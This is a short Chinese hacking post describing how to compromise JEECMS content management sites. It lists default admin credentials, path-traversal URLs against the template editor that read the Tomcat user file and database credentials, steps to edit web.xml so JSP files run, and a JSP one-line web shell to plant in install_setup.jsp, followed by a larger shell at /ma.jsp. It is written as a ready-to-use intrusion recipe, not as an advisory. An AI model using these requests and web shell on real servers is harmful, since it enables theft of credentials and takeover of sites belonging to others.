天天看點

JEECMS編輯漏洞及随便拿webshell,啊哈哈

JEECMS是基于java技術開發,繼承其強大、穩定、安全、高效、跨平台等多方面的優點 · 采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技術架構 安全性做得非常變态,當網站安裝完成後就不再允許執行任何目錄下的jsp檔案了(web.xml配置了過濾器禁止了很多種動态腳本)。

2.x背景:

login/Jeecms.do

3.x背景:

jeeadmin/jeecms/index.do

預設賬戶:admin

預設密碼:password

擷取tomcat密碼:

/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml

擷取JDBC資料庫賬号密碼:

/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties

JEECMS編輯漏洞及随便拿webshell,啊哈哈

JEECMS2.x版讀取路徑:

admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties

JEECMS編輯漏洞及随便拿webshell,啊哈哈

修改web.xml取消對jsp的過濾:

/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml

JEECMS編輯漏洞及随便拿webshell,啊哈哈

admin/core/template/Com_edit.do?relPath=\../../../web.xml

JEECMS編輯漏洞及随便拿webshell,啊哈哈

修改install/install_setup.jsp:

/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp

JEECMS編輯漏洞及随便拿webshell,啊哈哈

admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp

JEECMS編輯漏洞及随便拿webshell,啊哈哈

插入Jsp一句話:

<%

if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("

("f"))).write(request.getParameter("t").getBytes());

%>

修改後的一句話目錄

/install/install_setup.jsp

一句話連接配接成功後的jsp大馬目錄:

/ma.jsp

JEECMS編輯漏洞及随便拿webshell,啊哈哈

注: